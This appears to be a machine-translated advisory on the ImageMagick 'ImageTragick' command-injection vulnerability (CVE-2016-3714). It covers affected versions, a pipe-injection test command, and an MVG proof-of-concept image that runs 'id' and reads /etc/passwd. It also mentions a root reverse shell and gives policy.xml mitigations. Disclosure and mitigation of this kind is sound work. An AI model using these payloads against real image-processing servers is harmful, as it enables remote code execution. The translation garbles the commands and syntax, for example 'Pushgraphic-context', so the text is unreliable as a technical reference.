ImageMagick explosion High-risk command execution vulnerability0x01 PrefaceImageMagick is a powerful, stable, open source toolset and development package that can be used to read, write, and process image files in more than 89 basic formats, including popular TIFF, JPEG, GIF, PNG, PDF, and PHOTOCD formats. Many of the website platforms are used to render processing pictures. Unfortunately, at number 3rd, some column vulnerabilities were exposed, one of which could cause remote code Execution (RCE) if you were working with a user-submitted picture. The vulnerability is for use in the wild. Many image processing plugins rely on ImageMagick libraries, including but not limited to PHP Imagick,ruby Rmagick and Paperclip, Nodejs ImageMagick, and so on.
The reason for this is that the execution code is caused by the lack of rigorous character filtering. Insufficient command filtering for file names passed to the backend causes remote code execution to be allowed during multiple file format conversions.
0x02 Impact Version RangeImageMagick 6.5.7-8 2012-08-17 (Manual test Risk present)
ImageMagick 6.7.7-10 2014-03-06 (Manual test Risk present)
Low version to 6.9.3-9released 2016-04-30
0x03 Vulnerability Verification1 Command VerificationIf the system is installed using ImageMagick, execute the following command locally:
Convert ' https://example.com ' |ls "-la ' out.png
If the Ls-la command executes successfully, a vulnerability exists. The LS command was not executed and an error was stated, stating that it was unaffected.
2 POC Verificationfirst build a well-prepared picture:
VI exp1.jpg
Pushgraphic-context
Viewbox 0 0 640480
Fill ' url (https://"|id && ls-al/etc/passwd") '
Popgraphic-context
Execution of the attack POC1, although there are errors, but both commands were successfully executed,
It means there's a flaw.
Then create a remote download bounce shell script and execute the shell command:
Execute successfully, on the accept server to see:
The root-right bounce shell comes up like this.
0x04 Repair SolutionCurrently the latest official repair patch version has not yet come out, so the following two preventive strategies for the time being recommended:
1. When uploading a picture, you need to use the file content to determine whether the user uploads the actual image type.
2. Use a policy profile to disable ImageMagick's risky encoders
For the ImageMagick global policy profile, under/etc/imagemagick, add the following configuration to the last line of Policy.xml:
Vi/etc/imagemagick/policy.xml
<policymap>
<policy domain= "coder" rights= "none" pattern= "ephemeral"/>
<policy domain= "coder" rights= "None" pattern= "URL"/>
<policy domain= "coder" rights= "None" pattern= "HTTPS"/>
<policy domain= "coder" rights= "None" pattern= "MVG"/>
<policy domain= "coder" rights= "None" pattern= "MSL"/>
</policymap>
To execute the attack POC2 look, unable to perform the download action and execute the command.
0x05 Reference Sourceshttps://imagetragick.com/
http://php.net/manual/zh/function.getimagesize.php
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714
https://security-tracker.debian.org/tracker/CVE-2016-3714
ImageMagick explosion high-risk command execution vulnerability